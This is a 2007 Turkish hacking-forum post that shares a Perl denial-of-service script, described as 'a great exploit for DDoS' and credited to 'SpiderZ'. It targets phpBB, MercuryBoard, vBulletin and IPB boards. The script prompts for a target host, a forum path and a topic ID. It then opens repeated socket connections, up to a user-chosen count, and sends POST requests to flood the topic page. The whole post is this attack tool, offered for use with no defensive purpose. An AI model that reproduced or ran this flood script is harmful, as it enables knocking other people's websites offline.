06-12-2007, 07:49
|
#1 (permalink)
|
|
Yüzbaşı
Üyelik tarihi: Jun 2007
Mesajlar: 337
|
DOS Atak phpBB, MercuryBoard, Vbulletin, IpB...
DOS Atak phpBB, MercuryBoard, Vbulletin, IpB
Ddos ıcın harıka bı exploıt buyrun
Kod:
PHP- Kodu:
#!/usr/bin/perl
print q{
_________________________________________________________________________
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>
**************************
* SpiderZ_0 Hacking Security *
**************************
# Auteur: SpiderZ
# View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb
# Site: [url]www.spiderz-board.dafun.com[/url]
# For: [url]www.h4cky0u.org[/url]
_________________________________________________________________________
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>
};
use IO::Socket;
print q{
-------------------------------------------------------------------------
=> Exploit created by: SpiderZ_0
=> Ins url du sito
=> senza inserire ( www - http )
=> };
$host = <STDIN>;
chop ($host);
print q{
-------------------------------------------------------------------------
=> Indiquez le chemin
=> cartella: ( /Forum/ )
=> };
$pth = <STDIN>;
chop ($pth);
print q{
-------------------------------------------------------------------------
=> phpBB ( viewtopic.php?t= )
=> MercuryBoard ( index.php?a=topic&t= )
=> Vbulletin ( showthread.php?t= )
=> Ipb ( index.php?showtopic= )
=> };
$t = <STDIN>;
chop ($t);
print q{
-------------------------------------------------------------------------
=> Numero Topic
=> Es: viewtopic.php?t=1 ( 1, 2, 3, ecc.. )
=> };
$topic = <STDIN>;
chop ($topic);
print q{
-------------------------------------------------------------------------
=> Quantité du flood ? ( 1 / 10000 )
=> };
$while = <STDIN>;
chop ($while);
while($x != $while )
{
$lrg = length $postit;
my $sock = new IO::Socket::INET
(
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket: $!\n" unless $sock;
print $sock "POST $pth"."$t$topic HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, ".";
$x++;
}
print q{
-------------------------------------------------------------------------
=> Attaque fini !
=> [url]www.spiderz-board.dafun.com[/url] Or [url]www.h4cky0u.org[/url]
-------------------------------------------------------------------------
};
|
|
|